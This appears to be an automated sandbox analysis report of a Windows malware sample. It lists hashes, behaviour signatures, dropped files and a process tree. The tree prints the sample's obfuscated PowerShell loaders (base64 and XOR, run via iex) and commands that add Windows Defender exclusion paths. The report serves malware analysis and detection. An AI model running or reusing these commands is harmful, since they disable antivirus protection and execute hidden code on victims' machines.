Analysis

  • max time kernel
    150s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-01-2025 17:49

General

  • Target

    2024-12-25/unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe

  • Size

    3.9MB

  • MD5

    ca535cb7f416a9b0c6404cc5d9d0c380

  • SHA1

    afa7cc852d8f33ad8fdc34ec24acd7ffa5250d06

  • SHA256

    ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432

  • SHA512

    46d804e65a4b9d1c0080672ce470f9610d3fc45f37b91c4d52af1faab48d73ffe24db63015e80086146898cddb0d0bd00643d1a0682cbc6ce3bc84182b871854

  • SSDEEP

    98304:n7gPBIcLPRvhj1yj/9R9T5/gKxzD0d0WMdS0kGmd:ILzj1G9T5JxzD00NSd

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ce8201ef3f097f928288c638ee20cb440fa4a4861c77ff5473669f9a4dfa1432.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Windows\system32\net.exe
      "net" session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4364
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -EncodedCommand JABiAGMAYQBhAGEAPQAnAGIARQBRAFEASgBsAGsAZgBFAGsAQQA4AGMAaQBnAGIAWQBFAFUAVQBOAEYAawBJAEEAVQBNAEwAQwBRAFkAQgBXAGgAawBNAEkAVwBBAG0ATwAwAGMAZwBlAFYATQB2AFcAaABvAG0AZgAxAGcAbQBGAFUARQBOAGYAeABvAGQAVwBrAFEAVABLAFgAQQBJAGMAbgBBAEwAQwBGAE0AWgBZAEMAQgAzAEoAWABNADAAQgBWADgAegBlAFYATQBqAFcAagBFAEEATgAyAEEAbQBHAFYAZwBLAFYAegBRAFkAWQBFAFUAWABLAFgAWQBrAEYAUQBBAHcAQwBCAHAAYwBXAGsAVQB1AE8ARgBnAGQAQQBWAHcATgBmAFEAVQBLAGMAdwA0AG0AQwBuAFUAZABPADIASQBLAEMARABRAFUAVwBrAFkANgBEAEcAQQAyAGMAawBRAEwAVgBoAG8AdgBXAGoAOABBAEMAMgBNAHAARQBWAHcAeABmAHgAbwBiAFkARQBVAEUAUABYAEEASQBJAEYAbwBnAGUAVgBNADYAWQB5ADgASQBKADMATQAzAEMAUQBVAEwAVQBTAFEAWABjAEQAUgB6AEYAbABzAG0AZABsADgATABDAFEAWQA1AFgAVAA4AHUAUABXAEEAaQBBAFgAMABJAGIAVABBAEcAWQB5AEIAMgBjAHcAPQA9ACcAOwAkAGEAbQBkAGsAPQAnADkAdwBCAE4AOgBxAEMANABpADoAYgBtACcAOwAkAHIAegBjAGkAeABrAGYAaAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGMAYQBhAGEAKQA7ACQAYQBkAHAAdgBpAGIAcgA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAByAHoAYwBpAHgAawBmAGgALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAcgB6AGMAaQB4AGsAZgBoAFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAYQBtAGQAawBbACQAaQAlACQAYQBtAGQAawAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhAGQAcAB2AGkAYgByACkAKQB8AGkAZQB4AA==
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -EncodedCommand JABoAGcAbwBvAHYAawBrAD0AJwBIAEYAdwAwAEQAUwBzAFoAQwB5ADAANgBFAGkAZABBAEUARgAwAHcASAB5AHMATwBHAEMANABOAGEAUQBsAGEASwBnAEUAbwBDAGgASQBnAEkAaQBvAG0ARwBWAHgAMABLAGcASQBDAFYAQwBvAGcARABDAHcATABIAHgAVgBHAEsAbAB3ADMAQQBnAEkATwBhAHgAMABOAGEARgB4AEMARQBEAGgAVABEAGcARQB5AEgARABJADEARwBWAHgANABLAGkAawBrAEgAQgBJAGcAQQBEAFUATQBOAHoAdABEAEUARgAwAHoAQQBnAFEAaQBEAEcAMAAyAGEAQgBVAEgASwBsADAASwBFAHkAbwBiAEcARABFAEwASABRAHAAUgBBAHgAWQBDAEkAUQBjAGIASQBnADgATQBhAEQAdABQAEsAbAA0AGUASgB4AEkAdwBhAHkAawBOAE4AaABWADAASwBpAGMAawBJAEIARQB2AEMARABFADMASAB4AFYAQQBFAEYAMABnAEYAaABBAHgARwBEAEUAMgBhAEIAbABlAEUAMQAwAHcASAB3AEkATwBPAFQAYwBtAEcAVgB4AGgARQB6AGMAcwBEAEEARQB4AEUARwBnAE4ATQBTAHQATQBBAEMAeABYAFAAUwBrAGcAYgB6AEkATgBhAFEAbABpAEwAUwBjAEsARgBoAEkAawBHAEIAQQBPAEQAVAA5AGQARQB6AGgAUwBXAEEAPQA9ACcAOwAkAHkAZABvAG4AdAB2AGcAPQAnAEkAbwBmAGUASAB3AFoAWQBvAFoAbQA2ACcAOwAkAHkAbQBkAHYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABnAG8AbwB2AGsAawApADsAJABjAHUAZQBmAG8AdABjAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHkAbQBkAHYALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAeQBtAGQAdgBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHkAZABvAG4AdAB2AGcAWwAkAGkAJQAkAHkAZABvAG4AdAB2AGcALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwB1AGUAZgBvAHQAYwApACkAfABpAGUAeAA=
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -EncodedCommand $ b n g w u = ' e R E 9 T G l k Y 2 Q j L w Y w Z G c h A V A A Y z o I O A M D a Q E h B V B e X W Y P O A M G U D s D Q W o B X S E z P E E i Z W Q D Q W l 0 C G U J W 1 o 8 a Q F a B F J r Y 2 M y P 1 l h Y W Q 5 B G I A Z y 8 J B m A i V x U I R H 9 Y B D 4 I P G N g f C 8 9 Q F J 0 f 2 I P B g c t e h J f U 2 E B Z 2 Y m P X g 9 U h E 5 X 1 d k S T o w L W Q / U G Q c U 1 V w c w I w P E 4 7 a m U + Q G c B e y c w P H h n e h V e c l Z 7 c z 4 I B m Q G U D t W Q 2 l r e 2 Y P O H Q C a g 4 h R m Z 0 d 2 Y L K H c j Z Q F a R F B r Z z o l E U U 8 U T s p X l I B B T E 6 O H Q Y a Q 4 M Q G c B e y c w P H h n e h A h A V A A Y z o I O A M E a g F a X 1 E B A W E l E m Q m a m Q H B G l e X S 8 j L w Y w e R F a B V F 0 R m E l E m R l a j s b X V A B X W Y O A n d u e h U 9 Q V d k S S U l E U U 8 a T t e W G l d d z w P L F k w Y w U u X 1 F d Z y U I L 0 V g V 2 Q H R F F 0 Z D E h K G Q j U h E h A F Z e A C w m A H g h V w F a B H p w A D g O K H c g e h V e X F F e Y D E m P A M h V x U u X 1 J e f z k O L G w n U D 8 E U 1 Z J Q j 0 O B n w l a j g h R F d 7 a D E 6 O H c 8 U Q E H X l Z 7 Q S I J W k U 8 U T s p X l I B B S M + B m B j V x U I Q 3 9 w c D 0 I P F 4 9 V h 4 f Q F B K B B I I W G A i V x U D U H x J Q j 0 J L E J n U B F W X F J K c G 8 j L l I 7 V x V e Y G o B W T o w I 2 A k a Q E 9 Y W p r f y Q j K A c C a g 4 h R m Z 0 d 2 Y L K H c 8 V z s l R m p d f y Y O I 2 9 g f G Q D W X p w V j 0 J L E J n U B F W X F J K B B I I W G A i V x U u Q G k A Y D E n K F 0 w V i w c X 1 J e f z k O L G w n U D 8 u D X p w Y y E L W G Q g U W Q p R m R K Y y M z P H g l U T 9 a e 2 l r W W Y h L 3 c k e h U 9 Q 1 I A Y y E I W X A l f z 0 h Q l d k B G Y h P Q Z g f C 8 9 W V F k Z z s J P H h j U j 8 u D X p 0 X T s j K F E 8 U j s h W 1 d 0 a y Y J A g M S a Q 4 h X l B e X S E O L F o h U T 8 E U 1 Z K c D 0 L B n g 4 V x E 1 R F B a B B M w M 3 g 9 U D s D Q 1 d 0 X S A I A n R u e h E 5 R 1 A B Z D E P E n c 5 B y c s d X l K c 2 8 l E U J u e h E 5 R 1 A B Z D E P E U U 8 U Q E H X l Z 7 Q S I J E n d u e h U 9 Q F J 0 f 2 I P B g c t e h 4 Y U 2 U B W T o J B m M j Z 2 Q l R W l k f 2 Y j I 0 U w e R B X U 3 9 k B D o j K G R l a j s b X V A B X W Y O A n R u f C w b D X w A A W E L P G 8 w e B U 9 R W o B W W Y w B l o u e A U t A 3 x K Y y M J W U 4 k V w E + U 2 N g c x k w M 1 U j Z m Q h W 2 l k Y 2 c I L G A 8 Z R E p T l I D d z w O L F o h U T 8 u Q G F r W T o z W G B n a Q U u W m J J Q T U 8 M 3 g 7 U D g h V 2 J k Y y I L P A M 0 Y g 4 t Q 2 F 0 d 2 Y z P U 4 a U W Q h X F F 1 S Q c z P H g l a g E L W F A C S R g L P H g u U W U h Q m l d Y C M 9 P A 9 m U D o t W 1 E B B D o y E W B k a Q E b A W p e e z s l L H w + V 2 Q 5 V 2 o B d z w L L U 4 N U W U 5 T W Z 0 W S A I B m M i a Q 4 H W H l J Q m E g I 1 4 + a Q E f T l J a c G 8 j K F 4 f a Q 4 + Q G F 0 d 2 Y w O F 0 i Y g E 9 X 2 F 0 d 2 M J E l E v e A V a c W p r Y z o m A H A 8 a R M H Q l d r e y w h L 2 8 n f z 0 p X 2 l 2 A C Y I B W B n a Q 4 i W 3 1 3 e C Y l E U U 8 a g 4 1 X F d 0 V T 8 j L w Y w Z z s 5 B 3 9 l f z w L L G A 8 V w E X W G l 1 Y z 4 J W U I C U D s D W m k B Z y 8 j K A c S a g E D R 1 Z g c C I 7 M 2 c w e R 4 H X W l k Q S w L A U V g e R F W B l d e X S Y z P G A i e h J f U 2 d e Z 2 U m P X g 9 U h E 5 X 1 d k S T o w L W Q / U G Q b Z V B e X S M z W V o g a g E Y U 3 9 l Z y w w M 3 w d a R U u X 2 l 7 d z o w I 2 8 w f w M X Q m k B C C M 8 I 1 o g a Q U t f l F d Y z o J B n A 9 V x E D B m l g c C I / B W A i Z x E 5 B m l k R j E 5 L F o 5 U h E 5 T l d 3 Q m E g I 1 J m a T s H R F F 7 W j E 6 O H Q Y a Q 4 M Q G Y B f z k w P G R m U R E 5 X 2 V 0 d y w L W n g 7 V x 4 9 R F F e V S w / W W B n e h V e d l F 0 S S A O W n h n a g 4 l B G B k a w Y I A H w / V x 4 9 W F B e X T o J E n c j Y R F W Q V d 1 f 2 Y I W H Q d a T 0 L Q l J k B D g + W Q M U a g 4 9 B G l r e y Y w M 3 s w f w A h B G p r e 2 Y 8 W V 4 7 U T 0 p B m p k X S U z P H w k a Q U u Q G B 0 X T 0 w L G A i f C w c X 1 c A Z z s L L F o k V g V a c l Z 0 Z z w O M 2 Q n U W R a Y V J k A D o + L F o j U g 4 + U 2 N g c D g / L W c g Z i 8 M A 3 x K Y 2 U O P G w 4 U g E X A X 9 Y d y U I L A 9 k Y B E p T W l 1 Y z o J B g c n U T s p B G l g c G 8 j K G Q 6 a g E X T m l n Q m E g I 1 J m a T s H R F F 7 W i M / B m A t V x E p T V d 2 X S M O L G A u V z s p R 3 p 3 A T E g W n Q C f i w t e n l J Q m E g I 1 J m a T s H R F F 7 W i M / B m A t V x E p T V d 2 f y A O P A N n e h J f U 3 1 3 V m E l E m R k V w E 1 W 1 J k S W M m B 3 h n a g 4 l B G U B W T o I A H B l a g E D R 2 p k e y U w O H d u e h U 9 B F B d Z z o l E U U 8 V 2 U 5 W V J 0 X S U P O A M P a g E b W G V 0 C A U O P A I w Y w U u X 1 d 7 e 2 c w P 0 V g e R 4 L B W l e W S Y I I 1 0 i Y g E X R 1 E A V R M w P A c / U T s 9 Y F d 0 d y 8 O K H d u e h U 9 W W p k S S w w P 0 V g e R E f B m p k Q j E 6 O H c + e R U I X 1 J e f z k O L G w n U D 9 a Y W p r f y Q + B n A j a Q U B X V x 6 c D 8 l E U I E a Q E L R F A A Y z o J A g c D a m Q H W G l 7 Z y U w P G Q C a g 4 h R n p w A B Q z W G Q n U W R b U 3 l 0 B C w I L E 5 m a R U u Q G V 7 e y Y w W V I 7 U D 8 u X 2 p r a z 4 O L F I + e h V e Z V B e X S M z W V o g a g E Y U 3 l 0 C G Q O B l o n a g E 5 Q X p w A A I w M 2 R n U g F a W l B K c D 0 O W G A 6 U h E D R 1 Z g c C I 8 L H A t U m Z a X F F k Z D E g L E Z l a g E c U 3 9 l Y z 4 J W U I G a g 4 9 W 3 p w Y 2 Q z B k I + U G Q D B F d a c C I 4 L G A t a m U l R F B 7 Y y Y I W Q I w e R E 1 Q G l k a y 4 z W F 4 m e h V e c 1 E A e z w w P 0 V g V Q d S C Q = = ' ; $ s q y e v j n o = ' 3 V o 4 3 3 1 V j k 6 W ' ; $ r z s i = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ b n g w u ) ; $ u m c g = ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ ( f o r ( $ i = 0 ; $ i   - l t   $ r z s i . L e n g t h ; $ i + + ) { $ r z s i [ $ i ] - b x o r [ b y t e ] $ s q y e v j n o [ $ i % $ s q y e v j n o . L e n g t h ] } ) ) ) ; [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ u m c g ) ) | i e x 
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2432

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      027f752ee0cbbc3ac151148c1292faee

      SHA1

      79a3e6fd6e0a6db95f8d45eb761a629c260f937c

      SHA256

      0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

      SHA512

      0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1ydpfag.qga.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4428-23-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

      Filesize

      10.8MB

    • memory/4428-26-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

      Filesize

      10.8MB

    • memory/4428-22-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

      Filesize

      10.8MB

    • memory/4428-21-0x0000020CAB700000-0x0000020CAB722000-memory.dmp

      Filesize

      136KB

    • memory/4428-11-0x00007FF9911F3000-0x00007FF9911F5000-memory.dmp

      Filesize

      8KB

    • memory/4972-0-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-6-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-1-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-3-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-4-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-5-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-8-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-7-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-71-0x0000000140000000-0x00000001403B0000-memory.dmp

      Filesize

      3.7MB

    • memory/4972-72-0x00007FF61E620000-0x00007FF61EA10000-memory.dmp

      Filesize

      3.9MB